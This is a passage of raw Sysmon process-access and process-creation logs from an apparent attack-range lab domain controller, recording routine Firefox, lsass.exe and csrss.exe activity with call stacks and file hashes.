Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000042588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.497{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.495{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.495{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.495{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.5.1125359186\1087222245" -childID 4 -isForBrowser -prefsHandle 4420 -prefMapHandle 4424 -prefsLen 31596 -prefMapSize 234522 -jsInitHandle 1112 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d0d4b05-a7bf-49f0-848b-29a952b6aa4b} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 4412 1fb46477758 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.494{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.494{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.493{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.493{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.493{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.493{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.493{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042576Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.492{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.491{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.490{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 